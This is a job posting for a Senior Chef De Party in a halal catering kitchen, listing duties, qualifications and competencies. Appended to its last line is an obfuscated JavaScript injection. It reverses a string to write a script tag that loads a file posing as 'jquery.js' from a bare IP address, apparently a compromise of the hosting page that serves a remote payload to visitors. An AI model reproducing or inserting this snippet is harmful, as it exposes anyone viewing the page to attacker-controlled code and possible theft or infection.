Industry : F&B
Report To : Sous Chef
Senior Chef De Party (Sr. CDP) is responsible for producing the Malay/India/Western Cuisine in Catering Kitchen and reporting to the Sous Chef of Malay/India/Western Kitchen for effectiveness & efficiency to meet/exceed the customers and market expectations on specialty menu while ensuring cost effectiveness and profitable margin.
• Follow standard operating procedures (SOP) for the specialty kitchen under instruction of the Sous Chef to ensure the kitchen section is carried out correctly and in a consistent manner.
• Produce and cook high quality dishes as per the designed menu for the specialty kitchen and continuously level up and improve to meet customer’s requirements.
• To follow the kitchen execution to ensure the section kitchen is able to prepare and deliver consistent and quality food as per the timeline.
• To assist the Sous Chef for the trainings and supervision to junior chefs and cooks on food preparation and presentation to ensure high quality and food safety standards are met.
• Monitor and manage food and product ordering request by keeping detailed records and minimizes wastes through proper waste management system and cost saving initiatives.
• Other tasks assigned from time to time.
• Plan and work together with the team to ensure budget requirements are met and managed well to avoid unnecessary high expenses for the kitchen.
• Identify and realize all cost-saving and cost-reduction opportunities where possible to meet the organization’s objectives.
• Work with the section Sous Chef to produce diversified menus in accordance with the organization’s policy and vision.
• Involve in the new dishes proposal and menu selections based on customer demand and seasonal ingredients to cater customer satisfactions and eventually increase business sales.
• Ensure all products and ingredients used in food preparation are HALAL and at highest level of quality and consistent to meet customer expectations
• Ensure cleanliness and maintenance of work areas as per organization’s standard of hygiene procedures at all times.
• Assist to oversee the safety regulations of the specialty kitchen operation areas ensuring proper handling of kitchen equipment and safe working practices with minimal incidents recorded.
• Minimum Diploma in Culinary or any relevant qualifications
• Minimum of 7 years of relevant experience in kitchen operations in F&B/Retail/Hospitality sector
• Minimum 5 years of experience in a specialty cuisine
• Communication / Networking
• Leadership / People Management
• Customer focus
• Passion for Excellence
• Financial Acumen
• Multi-tasking and able to work under pressure document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))